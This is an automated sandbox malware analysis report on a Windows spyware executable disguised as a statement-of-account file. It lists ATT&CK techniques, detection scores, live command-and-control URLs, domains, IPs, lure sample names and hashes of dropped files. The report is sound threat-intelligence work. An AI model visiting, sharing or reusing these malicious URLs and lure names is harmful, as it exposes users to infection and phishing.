Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	612 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HIRE SOA FOR DEC_2021.exe	42%	Virustotal		Browse
HIRE SOA FOR DEC_2021.exe	37%	ReversingLabs	Win32.Spyware.Noon
HIRE SOA FOR DEC_2021.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.1.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.2.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.3.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.ipconfig.exe.325796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.ipconfig.exe.28f11e8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
mmfirewood.net	1%	Virustotal		Browse
www.fjallravenz.online	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.fjallravenz.online/cxep/?oL08qf=sGuO4U2D4QpvxfM4Tie03jNQ5o3Udlnj3BRVJisDJxm1gCdwebUZDD2ARlBl478rs+gp&r4e=MFQPj4OXxHZ8i	100%	Avira URL Cloud	phishing
http://www.simonhaidomous.com/cxep/?oL08qf=UgSNVuZrhE3Z8z0ZgFZcy2vBLKCwBFY+sTDX0qorCT9gsCOpfKa0UREUH3qfIqk5g45k&r4e=MFQPj4OXxHZ8i	100%	Avira URL Cloud	malware
www.littlesportsacademy.com/cxep/	100%	Avira URL Cloud	malware
http://www.spacebymeghan.com/cxep/?oL08qf=ptEMQJ9wcGHn8Y3e8b7dTbimCX2/D160Z9ziomc9eLzNI2egxKU0hugwHCLO4F78raSg&r4e=MFQPj4OXxHZ8i	100%	Avira URL Cloud	malware
http://www.akshayaasri.com/cxep/?oL08qf=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hnRLry+JL4w&r4e=MFQPj4OXxHZ8i	100%	Avira URL Cloud	malware
http://www.morethanmummies.com/cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i	100%	Avira URL Cloud	malware
http://www.mmfirewood.net/cxep/?oL08qf=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQM++WQWQx0o&r4e=MFQPj4OXxHZ8i	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mmfirewood.net	160.153.136.3	true	true	1%, Virustotal, Browse	unknown
spacebymeghan.com	15.197.142.173	true	true		unknown
www.fjallravenz.online	104.21.86.185	true	true	4%, Virustotal, Browse	unknown
akshayaasri.com	212.1.210.76	true	true		unknown
www.morethanmummies.com	154.212.212.21	true	true		unknown
ghs.googlehosted.com	142.250.203.115	true	true		unknown
cdl-lb-1356093980.us-east-1.elb.amazonaws.com	52.6.230.169	true	false		high
toraportal.com	34.102.136.180	true	true		unknown
www.skworkforce.com	unknown	unknown	true		unknown
www.akshayaasri.com	unknown	unknown	true		unknown
www.estateglobal.info	unknown	unknown	true		unknown
www.cefseguranca-app.com	unknown	unknown	true		unknown
www.toraportal.com	unknown	unknown	true		unknown
www.com-weekly.email	unknown	unknown	true		unknown
www.simonhaidomous.com	unknown	unknown	true		unknown
www.mmfirewood.net	unknown	unknown	true		unknown
www.spacebymeghan.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.fjallravenz.online/cxep/?oL08qf=sGuO4U2D4QpvxfM4Tie03jNQ5o3Udlnj3BRVJisDJxm1gCdwebUZDD2ARlBl478rs+gp&r4e=MFQPj4OXxHZ8i	true	Avira URL Cloud: phishing	unknown
http://www.simonhaidomous.com/cxep/?oL08qf=UgSNVuZrhE3Z8z0ZgFZcy2vBLKCwBFY+sTDX0qorCT9gsCOpfKa0UREUH3qfIqk5g45k&r4e=MFQPj4OXxHZ8i	true	Avira URL Cloud: malware	unknown
www.littlesportsacademy.com/cxep/	true	Avira URL Cloud: malware	low
http://www.spacebymeghan.com/cxep/?oL08qf=ptEMQJ9wcGHn8Y3e8b7dTbimCX2/D160Z9ziomc9eLzNI2egxKU0hugwHCLO4F78raSg&r4e=MFQPj4OXxHZ8i	true	Avira URL Cloud: malware	unknown
http://www.akshayaasri.com/cxep/?oL08qf=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hnRLry+JL4w&r4e=MFQPj4OXxHZ8i	true	Avira URL Cloud: malware	unknown
http://www.morethanmummies.com/cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i	true	Avira URL Cloud: malware	unknown
http://www.mmfirewood.net/cxep/?oL08qf=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQM++WQWQx0o&r4e=MFQPj4OXxHZ8i	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nsis.sf.net/NSIS_Error	HIRE SOA FOR DEC_2021.exe	false	high
http://nsis.sf.net/NSIS_ErrorError	HIRE SOA FOR DEC_2021.exe	false	high
http://www.litespeedtech.com/error-page	ipconfig.exe, 00000008.00000002.924948301.00000000033D2000.00000004.10000000.00040000.00000000.sdmp	false	high
https://www.cloudflare.com/5xx-error-landing	ipconfig.exe, 00000008.00000002.924948301.00000000033D2000.00000004.10000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
212.1.210.76	akshayaasri.com	United States	47583	AS-HOSTINGERLT	true
160.153.136.3	mmfirewood.net	United States	21501	GODADDY-AMSDE	true
15.197.142.173	spacebymeghan.com	United States	7430	TANDEMUS	true
104.21.86.185	www.fjallravenz.online	United States	13335	CLOUDFLARENETUS	true
154.212.212.21	www.morethanmummies.com	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
52.6.230.169	cdl-lb-1356093980.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562107
Start date:	28.01.2022
Start time:	13:41:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	HIRE SOA FOR DEC_2021.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@11/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 62.8% (good quality ratio 57.8%) Quality average: 73.9% Quality standard deviation: 30.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 60
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 204.79.197.222
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, fp.msedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
212.1.210.76	payment advice_008900112.exe	Get hash	malicious	Browse	www.akshayaasri.com/cxep/?B2=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hn7UbC+NJww&q6AX42=-ZSlwfH84L
160.153.136.3	payment advice_008900112.exe	Get hash	malicious	Browse	www.mmfirewood.net/cxep/?B2=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQMUhmgWUz8o&q6AX42=-ZSlwfH84L
	Proforma Fatura ektedir.exe	Get hash	malicious	Browse	www.shristiprintingplaces.com/euv4/?mBiH1=0FNpdr18&XN9Hw2f=q4xZ/6OOfzPciTFpuF0Gkk2qmIDvEbdT0Yq8MskyxWCw0DuLz5IKfgRxmyeIthOT0KU7o+S+qg==
	RFQ.exe	Get hash	malicious	Browse	www.sweet-comforts.com/oms5/?Z2=9XAZhw+se6B7r8wCqFEsAYn8gbTzfc2RWAteIcuUHm8/fb/J4/nNaoXppleeaY7KXARW&uP=3fKPnl1xw
	Purchase Order.doc	Get hash	malicious	Browse	www.renotechllc.net/fezu/?n8xdfvSp=0c+B+H/ZaZiQ/3jLhpg5vKAmw3taKt+EU+Fg0u/ApaJpyvBpDTEHsZ76Nhf0HUca4y6Q8w==&SVDD_8=xli8
	Halkbank,pdf.exe	Get hash	malicious	Browse	www.trulyproofreading.com/n8bs/?7nXHnrPH=y7RT12SiXO3cPBo3HBs9tcT5NzCj7hQwXJ50dTBzPCzTNw9q5k5LjJL6Ao0cxCNedTGy&s2Mpf=0v9XiVbh9l60a
	Sales contract no SINV-7774.xlsx	Get hash	malicious	Browse	www.negc-inc.com/p2a5/?j6AlQ0=5/6uidIKoOsGwvYoLjHgihJJplX4nvzF6OlPokAW0X8kA+LwMrwZIr1eYk/Ey0HbHMvNQg==&etx=pPgHxBrPXfzL
	scan doc_o1022111234.exe	Get hash	malicious	Browse	www.mmfirewood.net/cxep/?mR=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQMUhmgWUz8o&BTnH=KPvDH22XU
	MV ULTRASONIC_PDA$62,000.exe	Get hash	malicious	Browse	www.goodnewsmbc.net/igwa/?o8=RQV8msU6VBBXrtys6Ivfw7Cnw7ZeCh/GQVbFLWYR/dMBimUjeDHoU0i35gT3H5iMhk/k&ndDpDX=6lL4FTi8oJ
	DHL SHIPMENT PARCELS.exe	Get hash	malicious	Browse	www.layeronelabs.com/b5ce/?7nx=oN6tPd&vT=/N2VUCY/onPbFQ2uBeHyiDYSYm078D158eNFTxgjDqOmsZSx908qnIuTrgff3O5U0Ze4
	DHL - FINAL REMINDER -Receiver Address verification.exe	Get hash	malicious	Browse	www.leodawn.com/s6ap/?p8J=z/l2B1lqmx0l5ve1T5voEfhFBiObbSgtiFyLP+4rXZYGTUqYUp+BTsQZ+3yz2oYznCoa&4hcT8R=8pG8rD2X2RKL
	New Purchase Order #4522028497.exe	Get hash	malicious	Browse	www.leodawn.com/s6ap/?z0G=z/l2B1lqmx0l5ve1T5voEfhFBiObbSgtiFyLP+4rXZYGTUqYUp+BTsQZ+0Sj5JIL5nBd&l2MH_=iL3TVx
	BOSFA Pty -Project File - PRICE REQUEST Ref#938019.94 Australia.xlsx	Get hash	malicious	Browse	www.slingplugrentals.com/c8te/?-Zj=4hwxsN20_t6XX2&dxo8s=w3dBN0k1BBmdmUygHwU1W6a7auF0UE4xdbISCbnzMIcY4MiwMq0HAfbdLc1AbaN6gGOTAQ==
	Ocxwgtrrxrnbohidoxavjksseafwerivek.exe	Get hash	malicious	Browse	www.jameymichaelking.com/fm6i/?7nEDMf=F0Kzgfha7sI3ZqITv35FLBPxF59AWE42ea1QyNobV8nAi3nWKGuroSnZjHmYVtb5tvWt&vP=gtcP8ZKxwjO4ijC0
	doc545665-0988976-099876.exe	Get hash	malicious	Browse	www.leodawn.com/s6ap/?q6dPBH=VDK0&8pr8=z/l2B1lqmx0l5ve1T5voEfhFBiObbSgtiFyLP+4rXZYGTUqYUp+BTsQZ+0ea1okLuhdMRDVmrg==
	Swift copy of payment.exe	Get hash	malicious	Browse	www.antongussi.com/ioup/?THCp=5+sN2HiRfUmVjHlgQoL/wvVHLgtiTHFoAs3TeDVmLFInoz8eqXM0bB+BL3fjSp8WVXJp&rPMT9D=EBZd
	D8864mXoGw.exe	Get hash	malicious	Browse	www.deedeesdivination.com/ou5c/?uP=6l3X1hBX_&APnt=mZCOIdCE/yxuUSh4oijfdbd/ofMC14DgifLTcEw71pINxjnuPPzB9+2FMah8YhghSZDp
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	www.sirensandiego.com/a34b/?iL3=/+fNZHXs4lVQV8YvgCXwauaPewHwKruor4MpTrLEdWmHtq6oJY+Zm+fwxIPKBZPU5HKE&u6V=6lsTdv8hOBKHab90
	ZEHex8xRX5.exe	Get hash	malicious	Browse	www.markarge.com/fqiq/?o6=xFQPl4DH7&6lo4=XEjjI14vJqIlFQpayrI6OtCMD91wQ8G2c0xgE1KnwS5274C5XxEXJ12f7AflGTpdY0+d
	q9VO0ItTRSrphpi.exe	Get hash	malicious	Browse	www.veganrealms.com/9mj8/?_drLUd6=c6DxP5ciEvgyaWZXxww8j+vEVpR9ocMTCQ9EhtirexMUoN4KzTiu7HfSwCOZF2gWAWyV&a480=H2JhP2Z88l
	Order Confirmation nr. 2021O1274.xlsx	Get hash	malicious	Browse	www.markarge.com/fqiq/?fr48=XEjjI14qJtIhFAlWwrI6OtCMD91wQ8G2c0pwY2Wm0y537Ju/QhVbfxOd4lzzCDtuT3jtCg==&eV8huJ=VVAh7b

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdl-lb-1356093980.us-east-1.elb.amazonaws.com	New Order.exe	Get hash	malicious	Browse	52.207.42.116
	Copia de pago bancario.exe	Get hash	malicious	Browse	3.220.253.73
	KBSS2bOkqj.exe	Get hash	malicious	Browse	3.220.253.73
	Siparis listesi.042531524252628827.PDF.exe	Get hash	malicious	Browse	18.215.10.71
	Purchase Order.exe	Get hash	malicious	Browse	52.71.56.247
	Purchase Order.exe	Get hash	malicious	Browse	52.71.56.247
	04648027CB82497087F5B36B8D2FDF12CE9412349C728.exe	Get hash	malicious	Browse	18.215.10.71
	payment advice_16000.exe	Get hash	malicious	Browse	52.21.5.29
	UaTmOE6yP9.exe	Get hash	malicious	Browse	54.85.93.188
	ejecutable2.exe	Get hash	malicious	Browse	35.168.81.157
	QUOTATION.exe	Get hash	malicious	Browse	54.85.93.188
	truck pictures.exe	Get hash	malicious	Browse	54.85.93.188
	TT Swift Copy.exe	Get hash	malicious	Browse	18.208.31.123
	COAU7229898130.xlsx	Get hash	malicious	Browse	18.208.31.123
	KOC RFQ.doc	Get hash	malicious	Browse	52.204.77.43
	DOC.exe	Get hash	malicious	Browse	54.85.93.188
	SOA.exe	Get hash	malicious	Browse	23.20.208.181
	REQUEST_PURCHASE_INQUIRY (2).exe	Get hash	malicious	Browse	54.85.93.188
	Y0GEeY1WOWNMYni.exe	Get hash	malicious	Browse	52.205.158.209
	PVCbiDUqly50DqS.exe	Get hash	malicious	Browse	52.205.158.209
ghs.googlehosted.com	Gij2MGatTS.exe	Get hash	malicious	Browse	142.250.184.211
	payment advice_008900112.exe	Get hash	malicious	Browse	142.250.184.211
	BANK DETAILS-25012022-971332pdf.exe	Get hash	malicious	Browse	142.250.184.243
	new order.xlsx	Get hash	malicious	Browse	142.250.184.211
	Inquiry2226.exe	Get hash	malicious	Browse	142.250.184.243
	81509562.exe	Get hash	malicious	Browse	142.250.184.115
	SKM-0614483-pdf.exe	Get hash	malicious	Browse	216.58.198.51
	Order-410692-pdf.exe	Get hash	malicious	Browse	216.58.198.51
	scan doc_o1022111234.exe	Get hash	malicious	Browse	142.250.185.211
	DHL SHIPMENT PARCEL.exe	Get hash	malicious	Browse	172.217.168.19
	NeysU3tQXs.exe	Get hash	malicious	Browse	142.250.186.115
	_SwiftPrint.exe	Get hash	malicious	Browse	142.250.186.115
	IMG-89495739.exe	Get hash	malicious	Browse	142.250.186.115
	QUOTATION-PDF- SCAN COPY.exe	Get hash	malicious	Browse	142.250.203.115
	REF-NO-SCML121268.exe	Get hash	malicious	Browse	142.250.203.115
	1P0BZa6fk3.exe	Get hash	malicious	Browse	142.250.186.179
	2021.12.23 #4 205WESOLARES.pdf .exe	Get hash	malicious	Browse	142.250.203.115
	Payment Advice.exe	Get hash	malicious	Browse	142.250.203.115
	DHCM211220162538.exe	Get hash	malicious	Browse	142.250.203.115
	2NU3hgMIz7.exe	Get hash	malicious	Browse	142.250.203.115
www.fjallravenz.online	payment advice_008900112.exe	Get hash	malicious	Browse	172.67.223.184

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-HOSTINGERLT	2026P-2801.xls	Get hash	malicious	Browse	37.44.244.177
	Mail_27012022.xls	Get hash	malicious	Browse	37.44.244.177
	gLbGdSSQmEnKdhkSLJv.dll	Get hash	malicious	Browse	37.44.244.177
	x6eU6QrnmgTO4svU.dll	Get hash	malicious	Browse	37.44.244.177
	MrrnzVVCORolbHHw.dll	Get hash	malicious	Browse	37.44.244.177
	BR 18833597536.xls	Get hash	malicious	Browse	37.44.244.177
	DOCUMENT_652.xls	Get hash	malicious	Browse	37.44.244.177
	j1GErOk7uGUZ8YB.dll	Get hash	malicious	Browse	37.44.244.177
	pack_2801.xls	Get hash	malicious	Browse	37.44.244.177
	report_6.xls	Get hash	malicious	Browse	37.44.244.177
	xhsI-690.xls	Get hash	malicious	Browse	37.44.244.177
	comments_175343.xls	Get hash	malicious	Browse	37.44.244.177
	https___grupomartinsanchez.com_wp-admin_QpFDJPMY49_Thu_Jan_27_11_18_39_AM_CST_2022.dll	Get hash	malicious	Browse	37.44.244.177
	CT 7839428.xls	Get hash	malicious	Browse	37.44.244.177
	https___pcovestudio.com_wp-admin_c3zgRi2wXwCbdSD3iz_Thu_Jan_27_11_18_36_AM_CST_2022.dll	Get hash	malicious	Browse	37.44.244.177
	putcMPXtiu.dll	Get hash	malicious	Browse	37.44.244.177
	IWkpuNsvok.dll	Get hash	malicious	Browse	37.44.244.177
	LPmYZEn3Bm.dll	Get hash	malicious	Browse	37.44.244.177
	stDS7lON3x.dll	Get hash	malicious	Browse	37.44.244.177
	D4isWjCnV5.dll	Get hash	malicious	Browse	37.44.244.177
GODADDY-AMSDE	3FB154482EF8AE49941C9ED13063294CD4F97E28E5DD8.exe	Get hash	malicious	Browse	160.153.249.159
	3D41425DAA1E1844BE0539723042DC532A640E5BA9EF9.exe	Get hash	malicious	Browse	160.153.249.159
	payment advice_008900112.exe	Get hash	malicious	Browse	160.153.136.3
	Proforma Fatura ektedir.exe	Get hash	malicious	Browse	160.153.136.3
	RFQ.exe	Get hash	malicious	Browse	160.153.136.3
	ADA6977ABF5CAA24A75F0DB17220267F6B05F11ED9497.exe	Get hash	malicious	Browse	160.153.249.159
	Purchase Order.doc	Get hash	malicious	Browse	160.153.136.3
	Halkbank,pdf.exe	Get hash	malicious	Browse	160.153.136.3
	Sales contract no SINV-7774.xlsx	Get hash	malicious	Browse	160.153.136.3
	OFERTA1 ENERO.exe	Get hash	malicious	Browse	160.153.133.152
	scan doc_o1022111234.exe	Get hash	malicious	Browse	160.153.136.3
	MV ULTRASONIC_PDA$62,000.exe	Get hash	malicious	Browse	160.153.136.3
	DHL SHIPMENT PARCELS.exe	Get hash	malicious	Browse	160.153.136.3
	DHL - FINAL REMINDER -Receiver Address verification.exe	Get hash	malicious	Browse	160.153.136.3
	shipping documents.exe	Get hash	malicious	Browse	160.153.132.203
	SOA - DUE PAYMENTS.exe	Get hash	malicious	Browse	160.153.132.203
	New Purchase Order #4522028497.exe	Get hash	malicious	Browse	160.153.136.3
	BOSFA Pty -Project File - PRICE REQUEST Ref#938019.94 Australia.xlsx	Get hash	malicious	Browse	160.153.136.3
	Ocxwgtrrxrnbohidoxavjksseafwerivek.exe	Get hash	malicious	Browse	160.153.136.3
	doc545665-0988976-099876.exe	Get hash	malicious	Browse	160.153.136.3

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nmdcx8dorpuxth4

Download File

Process:	C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe
File Type:	data
Category:	dropped
Size (bytes):	215195
Entropy (8bit):	7.993371558145753
Encrypted:	true
SSDEEP:	6144:S4MsPfqHCpD/3QqPvIGcgvpd97JJs0p2Vwd8:vMk7/rRd97J+O2Vwe
MD5:	19A6D15C584C7CED29C4BE7B6E5C8310
SHA1:	CBE7A6A76AA53EB978275231E80552B9C7150D6D
SHA-256:	26D815E0D2F66777DD1ED59FAC4FDA402951E67B530183EF7F16E0A87E440607
SHA-512:	93AD0BAF26DC907821CC3DF6EAB9B0293213EFB9A9C8646DCBA80C2AEBB06A70D0A4E175FB907A8CAE38707E96FC6552805B33F8766124C74595896E85813912
Malicious:	false
Reputation:	low
Preview:	....t.f.U.O....z~k.aO....&..D......R........42e]\4.....R.`....H..6...lT.:v.%.+..59v...\|p0=..;.e...H..\|c.j..g.2Z-.....G.O..K.....T@...c.83..h.....`U......*:.2f.$t.)....R.b.~4.@....nAo...E..E:.0v .......(....Q..\Y#.Q.J..\3..)&...F..<BJ..k...V.J\3..r%.t.f....[.%.~..C.. .....D.D....R........42e]\4.....R^`...v.e.^Q...q(.'$.y.T.i....]....E...(.....p't:...\.l.w~A....G.O..d..SI../..VR.\|.xu...}..l..W.>..I.Yi.....MI.Qvg...@..\#=nfq..[.#.E..0v ....~:t...;Q..\Y#.Q8@..e3...@......DBJ.%.k..).V.J\...r%.t.f.....[.%.~Q.c.. .....D......R........42e]\4.....R^`...v.e.^Q...q(.'$.y.T.i....]....E...(.....p't:...\.l.w~A....G.O..d..SI../..VR.\|.xu...}..l..W.>..I.Yi.....MI.Qb.~4.@....nfy..[.5.E:.0v ....~:t....Q..\Y#.Q8@..e3...@......DBJ.%.k..).V.J\...r%.t.f.....[.%.~Q.c.. .....D......R........42e]\4.....R^`...v.e.^Q...q(.'$.y.T.i....]....E...(.....p't:...\.l.w~A....G.O..d..SI../..VR.\|.xu...}..l..W.>..I.Yi.....MI.Qb.~4.@....nfy..[.5.E:.0v ....~:t....Q..\Y#.Q8@..e3.

C:\Users\user\AppData\Local\Temp\nslEC78.tmp

Download File

Process:	C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe
File Type:	data
Category:	dropped
Size (bytes):	268283
Entropy (8bit):	7.6429002734152185
Encrypted:	false
SSDEEP:	6144:dH4MsPfqHCpD/3QqPvIGcgvpd97JJs0p2VwdZDw:iMk7/rRd97J+O2Vwr
MD5:	5D94CFA0DD7D4CC68EDEB9CAB7E1EF7E
SHA1:	2AF4AC4BA60F62E268A019082FEE442641BEF1DD
SHA-256:	AE66CE11CF30DA19A8A9319CFE9176DF4C09CF08BDD956F024398C53E7EE1F41
SHA-512:	652C233D5C41B072416141C5D5EFB110C32ACAC2BC253FA637CAF4A5942E23BC4A366A80A5A88723CE28437E816A0A9CDFE0C9708A73C79A417916B0617515B2
Malicious:	false
Reputation:	low
Preview:	.j......,........................O.......i......xj..............................................................:...........................................................................................................................................................................J...................j...........................................................................................................................................P...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll

Download File

Process:	C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20992
Entropy (8bit):	5.746712337711455
Encrypted:	false
SSDEEP:	384:b6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhboqTb:bG1albrXY0HwinMdZeUhbo+b
MD5:	0BCCDBF53DEF482E16174CD6488E0CED
SHA1:	B33612410ABDBC5644292052C943EF5CC21F73A2
SHA-256:	DA9CDFE0680A235BC1EF297EAA6CF5723F34B95A043700E8ACE1BD8C24CE974C
SHA-512:	68B4D0FE21B58486FC07B53F57B75FE509E858FAFDD79B300DFB93E521CB2400693A3F18AE8AD941BFDDCA88FA6941ABF0B83D373CA7DA8C530254D8E9905846
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L....*.a...........!.....@...................P............................................@.........................0Q..H...xQ.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yyyvokmb

Download File

Process:	C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe
File Type:	data
Category:	dropped
Size (bytes):	4800
Entropy (8bit):	6.198337761833235
Encrypted:	false
SSDEEP:	96:+YWprIk5aM/Xh/s+Gt2Dw1xTv7VVOrHdr3vPWAmpvJytv9uAVpVk/aXEDT6hlI87:dWpMKz/Rsh2Dw1xvVa9rfpmvytVZVs7w
MD5:	E66B15AA06214E6D88ECF31208BF636B
SHA1:	4ECD3FBCD14C48BBEE63D8B73DE26CE2C5C4FC42
SHA-256:	CB56D5562DFC52D2A9C672B2000E434D9B4BA5B63E679FC76018C86D4328E68A
SHA-512:	555BDA57EA973BA918337D61EE159FC64B7528708309A4A8130C90ECA9A92D418FDFBD1AB7F7927DAF8BFB2A56AE14318DA351A63D1B85D7DF1A1017EC5D04B7
Malicious:	false
Reputation:	low
